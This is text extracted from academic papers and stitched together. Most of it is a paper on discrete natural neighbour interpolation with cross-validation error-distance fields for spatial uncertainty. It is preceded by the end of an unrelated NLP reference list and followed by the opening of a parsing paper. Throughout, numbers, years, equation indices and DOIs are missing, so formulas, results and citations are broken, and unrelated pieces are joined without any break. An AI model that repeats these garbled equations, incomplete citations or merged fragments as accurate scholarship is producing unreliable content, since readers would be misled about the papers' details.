furu wei, baobao chang, and ming zhou. a. gated self- matching networks for reading comprehension and question answering. in proceedings of acl, pages – , vancouver, canada. zhiguo wang, wael hamza, and radu florian. b. bilateral multi-perspective matching for natural language sentences. in proceedings of ijcai, pages – , melbourne, australia. caiming xiong, stephen merity, and richard socher. . dynamic memory networks for visual and textual question answering. in pro- ceedings of icml, pages – , new york city, usa. caiming xiong, victor zhong, and richard socher. . dynamic coattention networks for question answering. in proceedings of iclr, toulon, france. wenpeng yin, hinrich schütze, bing xiang, and bowen zhou. . abcnn: attention-based convolutional neural network for modeling sen- tence pairs. tacl, : – . submitted may accepted june published july corresponding author thomas r. etherington, ethering- tont@landcareresearch.co.nz academic editor tianfeng chai additional information and declarations can be found on page doi . /peerj-cs. copyright etherington distributed under creative commons cc-by . open access discrete natural neighbour interpolation with uncertainty using cross-validation error-distance fields thomas r. etherington manaaki whenua—landcare research, lincoln, new zealand abstract interpolation techniques provide a method to convert point data of a geographic phenomenon into a continuous field estimate of that phenomenon, and have become a fundamental geocomputational technique of spatial and geographical analysts. natural neighbour interpolation is one method of interpolation that has several useful proper- ties: it is an exact interpolator, it creates a smooth surface free of any discontinuities, it is a local method, is spatially adaptive, requires no statistical assumptions, can be applied to small datasets, and is parameter free. however, as with any interpolation method, there will be uncertainty in how well the interpolated field values reflect actual phenomenon values. using a method based on natural neighbour distance based rates of error calculated for data points via cross-validation, a cross-validation error-distance field can be produced to associate uncertainty with the interpolation. virtual geography experiments demonstrate that given an appropriate number of data points and spatial-autocorrelation of the phenomenon being interpolated, the natural neighbour interpolation and cross-validation error-distance fields provide reliable estimates of value and error within the convex hull of the data points. while this method does not replace the need for analysts to use sound judgement in their interpolations, for those researchers for whom natural neighbour interpolation is the best interpolation option the method presented provides a way to assess the uncertainty associated with natural neighbour interpolations. subjects computational science, spatial and geographic information science keywords convex hull, digital, neighbor, python, raster, sibson, virtual geography experi- ments, voronoi diagram introduction spatially continuous geographic phenomena are often only measured at point locations. interpolation techniques provide a method to convert such point data into a continuous estimate of the phenomenon, and have become a fundamental computational technique of spatial and geographical analysts with key texts devoting large sections to interpolation methods (burrough & mcdonnell, ; o’sullivan & unwin, ; slocum et al., ). natural neighbour (or sibson) interpolation is an interpolation technique that was first presented by sibson ( ). the method is based upon a voronoi (or: dirichlet, thiessen) diagram that partitions space to identify those areas that are closest to a set of points (okabe et al., ). previous authors (sambridge, braun & mcqueen, ; watson, ) have noted several useful properties of natural neighbour interpolation: (i) the method is an how to cite this article etherington tr. . discrete natural neighbour interpolation with uncertainty using cross-validation error- distance fields. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:etheringtont@landcareresearch.co.nz mailto:etheringtont@landcareresearch.co.nz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. exact interpolator, in that the original data values are retained at the reference data points; (ii) the method creates a smooth surface free from any discontinuities; (iii) the method is entirely local, as it is based on a minimal subset of data locations that excludes locations that, while close, are more distant than another location in a similar direction; and (iv) the method is spatially adaptive, automatically adapting to local variation in data density or spatial arrangement. to this list i would add: (v) there is no requirement to make statistical assumptions; (vi) the method can be applied to very small datasets as it is not statistically based; and (vii) the method is parameter free, so no input parameters that will affect the success of the interpolation need to be specified. these properties make natural neighbour interpolation particularly well suited for the interpolation of continuous geographic phenomena from data points that have a highly irregular spatial distribution. while the choice of an appropriate interpolation method will always vary on a case by case basis, studies comparing interpolation methodologies with climate and land surface data demonstrate that natural neighbour interpolation is a highly competitive and sometimes optimal technique (abramov & mcewan, ; bater & coops, ; hofstra et al., ; lyra et al., ; yilmaz, ). unfortunately, natural neighbour interpolation can be relatively slow in comparison to other methods (abramov & mcewan, ). the high computational cost arises from the need to insert a new point into the voronoi diagram for every cell that will make up the interpolation field, and this geometric process becomes increasingly difficult in higher dimensions (park et al., ). this has led to the development of discrete (or digital) natural neighbour interpolation that is significantly quicker than traditional approaches (park et al., ) and has been applied successfully in a geographical context (keller et al., ). while natural neighbour interpolation has various useful properties, and the discrete form is computationally scalable, there is a great deal of uncertainty associated with any interpolation. therefore, being able to associate interpolation estimates with some form of uncertainty would be highly desirable. previous efforts for natural neighbour interpolation have been based upon fitting statistical uncertainty models (bater & coops, ; ghosh, gelfrand & mlhave, ), but this approach is contrary to natural neighbour interpolation’s useful properties (v), (vi), and (vii). therefore, for those researchers who decide that for their data and objectives natural neighbour interpolation is the best interpolation option, i present an approach to associate the interpolation with a measure of uncertainty that is consistent with all the useful properties of natural neighbour interpolation. materials & methods discrete natural neighbour interpolation in the -dimensional planar context that is most relevant to geographical applications, discrete natural neighbour interpolation begins by calculating a discrete voronoi diagram. first, a raster spatial domain c of cells c is defined such that c ∈c ⊂r and hence each c has coordinate attributes x,y for its centre so all ci={xi,yi}. etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the data points are then used to define a set p of n data cells p ={p ,p ,p ,...,pn} where p ∈c, and each data cell has coordinate attributes for its cell centre x,y and value z, so pi={xi,yi,zi}. when multiple data points occur within a raster cell, the resulting data cell has a value z that is the mean of all the data point values. the discrete voronoi polygon v (pi) that contains all the cells that are closest to each data cell can then be defined as v (pi)={c ∈c|d(c→pi)<d(c→pj) ∀ j = i} ( ) where d(c →p) is the euclidean distance between the centre of the cells c and p. when c is equally distant from more than one p for convenience c is assigned to the p with smallest index. the set of n discrete voronoi polygons then creates the discrete voronoi diagram v (p)={v (p ),v (p ),v (p ),...,v (pn)} ( ) that identifies which raster cells are closest to which data cells (fig. a) (okabe et al., ). in the process of calculating v (p) another set d(p→c) that records the euclidean distance from the set of data cells p to all raster cells c (fig. b) is created. as each data cell pi has an associated value zi, v (p) can be used to interpolate the data cell values across the raster to produce z(p), which in a geographic information system (gis) context is equivalent to nearest neighbour interpolation (burrough & mcdonnell, ; tomlin, ) (fig. c). to interpolate the data cell values using natural neighbour interpolation, the set of euclidean distances from an interpolation cell ci to all raster cells d(ci→c) is calculated (fig. d). then the discrete voronoi polygon for the interpolation cell v (ci) is defined as v (ci)={c ∈c|d(ci→c)≤d(p→c)} ( ) that is the set of raster cells that are as close or closer to the interpolation cell than any data cell. the set v (ci) can then be used to find the set of relevant data cell values z(ci)={c ∈z(p)|c ∈v (ci)} ( ) that will form the basis on the interpolation to that cell (fig. e). the natural neighbour interpolation estimate ẑ is then calculated as ẑ(ci)= ∑ z(ci) ]z(ci) ( ) where ∑ z(ci) is the sum of the cell values in z(ci) and ]z(ci) is the number of cells in the set z(ci), hence ẑ(ci) is simply the mean of z(ci). by calculating ẑ(ci) for all raster cells the natural neighbour interpolation is produced (fig. f). calculating uncertainty cross-validation error global error estimation is a traditional approach to measure the uncertainty of geographic models (zhang & goodchild, ). given a set of n paired observed o and modelled m values, the absolute error ei for each pair is ei =|mi−oi|, and a global estimate of error using a method such as the mean absolute error (mae) is calculated as mae = n n∑ i= ei ( ) etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure discrete natural neighbour interpolation. (a) for a set p of n data cells p the discrete voronoi diagram v (p) defines which raster cells are closest to which data cells and (b) the distance to the closest data cell d(p→c). (c) v (p) is used to interpolate the values z of the data cells to produce z(p). (d) for an interpolation cell ci the distance to all raster cells c is calculated as d(ci →c), and (e) by comparing d(ci →c) to d(p →c) identifies z(ci) which are those cells of z(p) that are as close or closer to the ci than any data cell p. the mean value of z(ci) is the natural neighbour interpolation estimate ẑ for ci, and by repeating this process for all raster cells (f) the natural neighbour interpolation is produced. full-size doi: . /peerjcs. /fig- that is simply the mean of all the absolute errors (willmott & matsuura, ). however, there is little point in doing this for the data cells of natural neighbour interpolation as given property (i) that it is an exact interpolator the estimated value ẑi for the data cells will always be the same as the actual value zi so the absolute errors will always be zero. therefore, mae needs to be applied in conjunction with a cross-validation approach that iteratively withholds each data cell pi from the set of data cells p to produce the set {p−pi}, and then uses interpolation to estimate the value ẑi at the withheld data cell pi on the basis of a discrete voronoi diagram v ({p−pi}) that is developed without the etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. withheld data cell. the absolute error ei for each data cell pi is then calculated as ei=|ẑi−zi| and the cross-validation mae can be calculated using eq. ( ). even with cross-validation the mae like all global error estimates, such as the commonly used root-mean-square error (rmse), are not ideal measures of uncertainty for a spatial interpolation (zhang & goodchild, ). as non-spatial methods that average errors across space they cannot indicate if errors are consistent across space or if higher errors in one region are balanced out by lower errors in another region. this is a critical limitation of global error estimation methods, as for application purposes it could be very useful to know where the interpolation uncertainty is higher or lower. cross-validation error field one way to communicate the spatial uncertainty of geographical information is to map estimates of error (zhang & goodchild, ). this has been attempted before for natural neighbour interpolation (bater & coops, ; ghosh, gelfrand & mlhave, ), but as already noted these statistical modelling approaches are contrary to natural neighbour interpolation’s useful properties (v), (vi), and (vii). another way to map estimates of error that is consistent with the properties of natural neighbour interpolation is the cross-validation error field (willmott & matsuura, ). this process begins in a similar manner to the cross-validation mae, but once e has been calculated for each data cell, rather than average the errors using eq. ( ) the errors are assumed to be spatially autocorrelated and interpolation is used to interpolate e to estimate an absolute error field ê. this use of localised absolute errors is highly advantageous as it is consistent with property (iii) of natural neighbour interpolation and allows for error estimates to reflect local changes in the spatial-autocorrelation of the phenomenon being interpolated, with lower errors in more autocorrelated areas and higher errors less autocorrelated areas. however, while the cross-validation error field does indicate where interpolation errors are likely to be higher, it cannot be used directly as a measure of uncertainty for natural neighbour interpolation as ultimately the interpolation is calculated using all n data cells and given property (i) of natural neighbour interpolation is that it is an exact interpolator we know we will have zero error and hence zero uncertainty at the data cells. on the basis of tobler’s first law of geography that ‘‘everything is related to everything else, but near things are more related than distant things’’ (tobler, ), zhang & goodchild ( ) recognise that distance is an important component of uncertainty as locations nearer to data should have less uncertainty. this relationship of increasing error with increasing distance to data has even been demonstrated for natural neighbour interpolation (keller et al., ). therefore, i propose to extend the cross-validation error field idea by incorporating distance to produce a cross-validation error-distance field that will better represent the uncertainty associated with natural neighbour interpolation. natural neighbour distances a positive relationship between natural neighbour interpolation absolute errors and the minimum distance to a data cell has been shown (keller et al., ), so this relationship could be used to predict absolute error as a function of distance from the nearest data etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure computation of the natural neighbour distance. (a) for an interpolation raster cell ci the eu- clidean distance to all data cells dj is calculated, and the discrete voronoi diagram v (p) is used to produce d(p) that interpolates the distances by the discrete voronoi polygons. (b) the cells of d(p) that are closer to ci than any data cell defines the set d(ci) and the mean value of this set gives the natural neighbour dis- tance δ for ci. (c) when repeated for all raster cells a natural neighbour distance field is produced. full-size doi: . /peerjcs. /fig- point. however, minimum distance to a data cell is a simplistic metric that does not account for the number and spatial configuration of the data cells (keller et al., ). in addition, using the minimum distance from data cells d(p) produces a field that has discontinuities along the edges of the discrete voronoi polygons (fig. b) that are contrary to the property (ii) of the natural neighbour interpolation method that creates surfaces free of any discontinuities. therefore, the natural neighbour distance δ is presented as a more appropriate measure of distance that incorporates information about the number, spatial distances, and relative positions of the data cells forming the interpolation. the method to calculate δ follows a very similar approach to that of calculating the interpolation, and therefore recycles various data structures that are used for the interpolation. for each interpolation cell ci the euclidean distances to all data cells are calculated dj =d(ci→pj), and then using the voronoi diagram v (p) these distances are interpolated via nearest neighbour interpolation to produce d(p) that is the distance to the data cells mapped into the discrete voronoi polygons (fig. a). the set v (ci) can be used again to find the set of relevant data cell distances d(ci)={c ∈d(p)|c ∈v (ci)} ( ) that will form the basis of the interpolation to that cell (fig. b). the natural neighbour distance is then calculated as δ(ci)= ∑ d(ci) ]d(ci) ( ) that is simply the mean value of the distances for the cells in d(ci). with δ calculated for all raster cells it becomes evident that unlike minimum distance that contains spatial etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. discontinuities (fig. b) the natural neighbour distance creates a smooth surface free of any discontinuities (fig. c). also, the minimum distance is an optimistic measure of distance as it only accounts for the closest data cell, whereas by comparison the distances for δ are larger as they recognise that the other data cells involved in the interpolation are further away. cross-validation error-distance field to incorporate δ into the estimate of error to produce a cross-validation error-distance field, the first step is still a cross-validation process in which each data cell is iteratively withheld and an estimate of the value of the withheld data cell is made with the remaining n− data cells. however, the absolute error e =|zi− ẑi| is now divided by the natural neighbour distance δ to calculate a rate of error r for each data cell ri= |zi− ẑi| δi ( ) with these rates of error stored so that each data cell becomes pi={xi,yi,zi,ri}. then when conducting the natural neighbour interpolation, while estimating the value ẑ an estimate of the rate of error r̂ can be simultaneously produced (fig. a) and used to produce an error estimate êi= r̂i×δi ( ) that when estimated for all cells produces a cross-validation error-distance field (fig. b). the cross-validation error-distance field clearly captures information from the rate of error field (fig. a) and the natural neighbour distance field (fig. c) with lower error estimates in areas that have either low rates of error or natural neighbour distances, and higher error estimates in areas that have higher rates of error and/or natural neighbour distances. therefore, the cross-validation error-distance field captures uncertainty information relating to local variation in both the autocorrelation of the underlying phenomenon field being interpolated and the spatial distribution of the data cells providing data for the interpolation. virtual geography experiments the discrete natural neighbour interpolation and cross-validation error-distance field algorithms described here were implemented using a python computational framework (pérez, granger & hunter, ) using the numpy (van der walt, colbert & varoquaux, ), scipy (virtanen et al., ), and matplotlib (hunter, ) packages. having proposed a new method, it is sensible to provide an evaluation of how performance varies under different conditions. however, in doing so it is important to remember that interpolation errors result not only from the efficacy of the interpolation method, but also from distribution of data points and the real (but unknown) distribution of the phenomenon field being interpolated (willmott & matsuura, ) that will be unique to each study. also, what constitutes an acceptable level of interpolation error will also vary between studies. therefore, the objective here is try and identify simple trends in performance to verify the methods work as would be expected and to provide some basic etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure computation of the cross-validation error-distance field. (a) the rate of absolute error for each data cell ri calculated through cross-validation, and then an estimated rate of absolute error field r̂ is produced by natural neighbour interpolation of r. (b) the cross-validation error-distance field ê that is the product of r̂ and the natural neighbour distance δ for each interpolation cell. full-size doi: . /peerjcs. /fig- information that will help an analyst to make a more detailed assessment of whether interpolation is feasible or not. to evaluate the effectiveness of the proposed interpolation methods, a series of in silico virtual geography experiments were conducted. virtual geographies are a very useful approach for methodological evaluation as the conditions can be tightly controlled and explored fully. virtual geographic phenomena fields for grids of × cells were created using the nlmpy package (etherington, holland & o’sullivan, ) implementation of the mid-point displacement fractal algorithm that produces fields representing natural phenomena such as land surfaces (fournier, fussell & carpenter, ). the spatial- autocorrelation of the values produced by the mid-point displacement method can be controlled by varying the h parameter to produce fields with spatial-autocorrelation that varies from low to high (fig. ). the underlying premise of the experiments was that with random sampling of a virtual geographic phenomenon with actual values z (fig. a), natural neighbour interpolation can be used to produce estimated values ẑ (fig. b). the absolute difference between the actual values and the estimated values is the value error e(ẑ)=|ẑ−z| (fig. c) that will indicate how well the natural neighbour interpolation method works. the value error is also estimated by the cross-validation error-distance field ê (fig. d), and the absolute difference between the value error e(ẑ) and the estimated error ê is the error of errors e(ê)=|ê−e(ẑ)| that indicates how well the proposed cross-validation error-distance field performs (fig. e). etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure examples of virtual geographic phenomena fields created by the mid-point displacement fractal algorithm. the spatial-autocorrelation varies from low to high and is controlled by the h parame- ter that in these examples has been set to (a) h= , (b) h= , and (c) h= . full-size doi: . /peerjcs. /fig- to summarise the performance of both natural neighbour interpolation and the cross- validation error-distance field, the mae (eq. ( )) was calculated for the cells inside and outside of the convex hull of the sampling points for both e(ẑ) (fig. c) and e(ê) (fig. e). the mae was chosen as the error statistic as it expresses error in the same units as the variable of interest and is insensitive to the number of cells in the sample (willmott & matsuura, ), which was important here as the convex hull area would vary as a result of the random sampling. when the spatial-autocorrelation and number of sample points is reduced we would expect a reduction in performance of both the natural neighbour interpolation and the cross-validation error-distance field (figs. a– e versus figs. f– j). therefore, to examine how the natural neighbour methods performed under varying conditions experiments were conducted in which h randomly varied uniformly between . to . and n randomly varied uniformly between to . the cross-validation mae was also calculated for each experiment to assess if the cross-validation mae could be used as an indicator of expected interpolation performance. results the results from the virtual geography experiments demonstrate that, as would be expected for the cells within the convex hull of the sampling points, the mae of the value errors e(ẑ) from the natural neighbour interpolation (fig. a) and error of errors e(ê) from the cross-validation error-distance field (fig. b) reduced as the number of data points n and the spatial-autocorrelation h of the underlying virtual phenomena fields increased. the effect of h was more important, as when h was low or high n did not have much effect on the performance. the importance of h is to be expected as all interpolation methods work on the assumption that the phenomenon being interpolated has sufficient levels of spatial-autocorrelation. etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the natural neighbour interpolation virtual geography experimental process. (a) a virtual geography phenomenon field z with spatial-autocorrelation of h= and n= random sampling points, (b) the resulting natural neighbour interpolation ẑ from the sampling points, and (c) value error e(ẑ) = |ẑ −z|. (d) the cross-validation error-distance field estimated error ê that is also produced during inter- polation is then compared to the value error e(ẑ) to produce (e) the error of errors e(ê) =|ê −e(ẑ)|. in- terpolation performance as a function of e(ẑ) and e(ê) was summarised for cells within and outside the convex hull of the sampling points. the same experimental process in (a–e) is replicated in (f–j) for a virtual geography phenomenon field with spatial-autocorrelation of h = and n = random sampling points, demonstrating a reduction in interpolation performance at lower levels of spatial-autocorrelation and sampling. full-size doi: . /peerjcs. /fig- there was also a very strong correlation between e(ẑ) and e(ê) (fig. c) and this similarity of behaviour under different conditions indicates that the cross-validation error-distance field meets the objective of providing a measure of uncertainty that is consistent with all the useful properties of natural neighbour interpolation. while the results of the virtual geography experiments (figs. a and b) indicate that lower average errors can be expected when n∼> and h∼> . (fig. b) such criteria cannot be easily applied by an analyst as while n is known h is unknown and in many situations will be hard to guess. fortunately, while the cross-validation mae that can always be calculated by an analyst is generally slightly higher than the e(ẑ) there is still a strong correlation between the two variables (fig. d), and this correlation is extremely useful as it indicates to an analyst the likely levels of e(ẑ) and therefore e(ê) too. a comparison of e(ẑ) and e(ê) inside and outside of the convex hull around the sampling points clearly shows that while the performance follows a similar trend e(ẑ) and e(ê) can be expected to be higher outside of the convex hull (figs. e– f). etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure performance of natural neighbour interpolation and cross-validation error-distance fields from virtual geography experiments. the mean absolute error (mae) of cells within the convex hull around sampling points for different experimental combinations of the number n of random sampling points and the spatial-autocorrelation h of virtual phenomena fields for (a) the value errors e(ẑ) from the natural neighbour interpolations and (b) the error of errors e(ê) from the cross-validation error-distance fields that (c) were highly correlated. (d) comparison of e(ẑ) and the cross-validation mae derived from the sampling points. comparison of interpolation performance inside and outside the convex hull around the sampling points for (e) e(ẑ) and (f) e(ê). full-size doi: . /peerjcs. /fig- etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. discussion the virtual geography experiments indicate that under suitable conditions the natural neighbour interpolation field and the cross-validation error-distance field should provide useful estimates of a geographic phenomenon field with associated uncertainty. the fact that the cross-validation error-distance field reflects localised changes in the spatial distribution of both the underlying phenomenon and the point data is particularly useful, and contrasts with other spatial interpolation uncertainty methods such as mae and rmse that estimate error using a global approach. the virtual geography experiments demonstrated that the performance of natural neighbour interpolation will be lower outside of the convex hull around the data points, as is expected (watson, )—although this is also likely to be true of all spatial interpolation techniques as beyond the convex hull interpolation becomes extrapolation. however, we do not suggest that interpolation should be restricted to within the convex hull as there may be occasions where the area of interest may occur slightly outside the convex hull. for example, when interpolating rainfall data from weather stations that are usually sited in settlements, there are likely to be areas of coastline along peninsulas and headlands that will not fall within a convex hull around the weather stations (lyra et al., ). therefore, it is logistically useful that discrete natural neighbour interpolation can produce estimated values beyond the convex hull of the available data points. what is helpful in this context is that the cross-validation error-distance field incorporates information on distance from data points, therefore as interpolations move further beyond the convex hull the error-field should increase to help to guard against erroneous estimates. however, the responsibility of appropriate use of natural neighbour interpolation still belongs with the spatial analyst who must make decisions about whether interpolation is useful based on their knowledge of: the expected spatial-autocorrelation of the phenomenon being interpolated, the number and distribution of data points, the location of the areas for which interpolations are required, and the magnitude of the estimated errors in relation to the magnitude of the value estimates. and of course, the cross-validation error-distance field only captures uncertainty in the interpolation itself and does not incorporate any uncertainty that may arise from the data itself. while i have argued against the use of the cross-validation mae as a measure of uncertainty, i would recommend that analysts continue to calculate the cross-validation mae given its strong correlation with the performance of the natural neighbour interpolation, and therefore the performance of the cross-validation error-distance field too. analysts can then use the cross-validation mae as a helpful guide when deciding if interpolation is advisable or not. when doing so it is important to remember that as the cross-validation mae is based on the use of n− data cells, the error estimates may be slightly higher than the real errors that would be based on all n data that is ultimately used in the interpolation (willmott & matsuura, ). therefore, the cross-validation mae should be seen as a slightly conservative indication of likely interpolation performance. etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion for those researchers for whom natural neighbour interpolation is the best interpolation option, the cross-validation error-distance field method presented provides a way to assess the uncertainty associated with natural neighbour interpolations that is consistent with the useful properties of natural neighbour interpolation. while the cross-validation error-distance method has been described here in the context of discrete natural neighbour interpolation, there is no reason why this same approach could not be applied to geometric natural neighbour interpolation as well. discrete natural neighbour interpolation has been implemented here in two-dimensional space for ease of visualisation, but the method will generalise to higher dimensions (park et al., ) and in principle i cannot see any reason why the uncertainty method presented could not also be applied in higher dimensions by those who wish to do so. the approach could easily be adapted to other interpolation methods, as all that is required is a measure of weighted distances to the data points creating the interpolation. given the promise of the algorithm, and to encourage its use and development, the python code used to generate the examples presented is freely available under the permissive mit license as supplementary material. additional information and declarations funding this work was supported by the strategic science investment funding for crown research institutes from the new zealand ministry of business, innovation and employment’s science and innovation group. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: strategic science investment funding for crown research institutes from the new zealand ministry of business, innovation and employment’s science and innovation group. competing interests thomas r. etherington is employed by manaaki whenua-landcare research, and declares that there are no competing interests. author contributions • thomas r. etherington conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: python scripts to reproduce the examples, virtual experiments, and figures are available as a supplementary file. etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abramov o, mcewan a. . an evaluation of interpolation methods for mars orbiter laser altimeter (mola) data. international journal of remote sensing ( ): – doi . / . bater cw, coops nc. . evaluating error associated with lidar-derived dem interpo- lation. computers & geosciences ( ): – doi . /j.cageo. . . . burrough pa, mcdonnell ra. . principles of geographical information systems. oxford: oxford university press. etherington tr, holland ep, o’sullivan d. . nlmpy: a python software package for the creation of neutral landscape models within a general numerical framework. methods in ecology and evolution ( ): – doi . / - x. . fournier a, fussell d, carpenter l. . computer rendering of stochastic models. communications of the acm ( ): – doi . / . . ghosh s, gelfrand ae, mlhave t. . attaching uncertainty to deterministic spatial in- terpolations. statistical methodology ( – ): – doi . /j.stamet. . . . hofstra n, haylock m, new m, jones p, frei c. . comparison of six methods for the interpolation of daily, european climate data. journal of geophysical research (d ):d doi . / jd . hunter jd. . matplotlib: a d graphics environment. computing in science & engineering ( ): – doi . /mcse. . . keller vdj, tanguy m, prosdocimi i, terry ja, hitt o, cole sj, fry m, morris dg, dixon h. . ceh-gear: km resolution daily and monthly areal rainfall estimates for the uk for hydrological and other applications. earth system science data ( ): – doi . /essd- - - . lyra gb, correia tp, de oliveira-jnior jf, zeri m. . evaluation of methods of spatial interpolation for monthly rainfall data over the state of rio de janeiro, brazil. theoretical and applied climatology ( ): – doi . /s - - - . okabe a, boots b, sugihara k, chiu sn. . spatial tessellations: concepts and applications of voronoi diagrams. nd edition. chichester: john wiley & sons. o’sullivan d, unwin dj. . geographic information analysis. nd edition. hoboken: john wiley & sons. park sw, linsen l, kreylos o, owens jd, hamann b. . discrete sibson interpo- lation. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . pérez f, granger be, hunter jd. . python: an ecosystem for scientific computing. computing in science & engineering ( ): – doi . /mcse. . . etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . / - x. http://dx.doi.org/ . / . http://dx.doi.org/ . /j.stamet. . . http://dx.doi.org/ . / jd http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /essd- - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /peerj-cs. sambridge m, braun j, mcqueen h. . geophysical parametrization and interpo- lation of irregular data using natural neighbours. geophysical journal international ( ): – doi . /j. - x. .tb .x. sibson r. . a brief description of natural neighbour interpolation. in: barnett v, ed. interpreting multivariate data. chichester: wiley, – . slocum ta, mcmaster rb, kessler fc, howard hh. . thematic cartography and geovisualization. harlow: pearson education limited. tobler w. . a computer movie simulating urban growth in the detroit region. economic geography ( ): – doi . / . tomlin cd. . geographic information systems and cartographic modeling. englewood cliffs: prentice-hall. van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science & engineering ( ): – doi . /mcse. . . virtanen p, gommers r, oliphant te, haberland m, reddy t, cournapeau d, burovski e, peterson p, weckesser w, bright j, van der walt sj, brett m, wilson j, millman kj, mayorov n, nelson arj, jones e, kern r, larson e, carey cj, polat i, feng y, moore ew, vanderplas j, laxalde d, perktold j, cimrman r, henriksen i, quintero ea, harris cr, archibald am, ribeiro ah, pedregosa f, van mulbregt p, vijaykumar a, bardelli ap, rothberg a, hilboll a, kloeckner a, scopatz a, lee a, rokem a, woods cn, fulton c, masson c, häggström c, fitzgerald c, nicholson da, hagen dr, pasechnik dv, olivetti e, martin e, wieser e, silva f, lenders f, wilhelm f, young g, price ga, ingold g-l, allen ge, lee gr, audren h, probst i, dietrich jp, silterra j, webber jt, slavi j, nothman j, buchner j, kulick j, schnberger jl, de miranda cardoso jv, reimer j, harrington j, rodrguez jlc, nunez-iglesias j, kuczynski j, tritz k, thoma m, newville m, kmmerer m, bolingbroke m, tartre m, pak m, smith nj, nowaczyk n, shebanov n, pavlyk o, brodtkorb pa, lee p, mcgibbon rt, feldbauer r, lewis s, tygier s, sievert s, vigna s, peterson s, more s, pudlik t, oshima t, pingel tj, robitaille tp, spura t, jones tr, cera t, leslie t, zito t, krauss t, upadhyay u, halchenko yo, vázquez-baeza y. . scipy . : fundamental algorithms for scientific computing in python. nature methods ( ): – doi . /s - - - . watson d. . the natural neighbor series manuals and source codes. computers & geosciences ( ): – doi . /s - ( ) - . willmott cj, matsuura k. . advantages of the mean absolute error (mae) over the root mean square error (rmse) in assessing average model performance. climate research ( ): – doi . /cr . willmott cj, matsuura k. . on the use of dimensioned measures of error to eval- uate the performance of spatial interpolators. international journal of geographical information science ( ): – doi . / . yilmaz hm. . the effect of interpolation methods in surface definition: an experimental study. earth surface processes and landforms ( ): – doi . /esp. . etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - x. .tb .x http://dx.doi.org/ . / http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /cr http://dx.doi.org/ . / http://dx.doi.org/ . /esp. http://dx.doi.org/ . /peerj-cs. zhang j, goodchild m. . uncertainty in geographical information. london: taylor & francis doi . /b . etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /b http://dx.doi.org/ . /peerj-cs. efficient structured inference for transition-based parsing with neural networks and error states ashish vaswani∗ usc information sciences institute vaswani@usc.edu kenji sagae∗ usc institute for creative technologies sagae@usc.edu abstract transition-based approaches based on local classification are attractive for dependency parsing due to their simplicity and speed, despite producing results slightly below the state-of-the-art. in this paper, we propose a new approach for approximate structured in- ference for transition-based parsing that pro- duces scores suitable for global scoring us- ing local models. this is accomplished with the introduction of error states in local train- ing, which add information about incorrect derivation paths typically left out completely in locally-trained models. using neural net- works for our local classifiers, our approach achieves . % accuracy for transition-based dependency parsing in english. introduction transition-based parsing approaches based on local classification of parser actions (nivre, ) remain attractive due to their simplicity, despite producing results slightly below the state-of-the-art. although the application of online structured prediction and beam search has made transition-based parsing com- petitive in accuracy (zhang and clark, ; huang et al., ) while retaining linear time complex- ity, greedy inference with locally-trained classifiers is still widely used, and techniques for improving the performance of greedy parsing have been pro- posed recently (choi and palmer, ; goldberg and nivre, ; goldberg and nivre, ; hon- nibal et al., ). recent work on the applica- tion of neural network classification to drive greedy transition-based dependency parsing has achieved high accuracy (chen and manning, ), showing ∗both authors contributed equally to this paper. how effective locally-trained neural network mod- els are at predicting parser actions, while providing a straightforward way to improve parsing accuracy using word embeddings pre-trained using a large set of unlabeled data. we propose a novel approach for approximate structured inference for transition-based parsing that uses locally-trained neural networks that, unlike pre- vious local classification approaches, produce scores suitable for global scoring. this is accomplished with the introduction of error states in local training, which add information about incorrect derivation paths typically left out completely in locally-trained models. our approach produces high 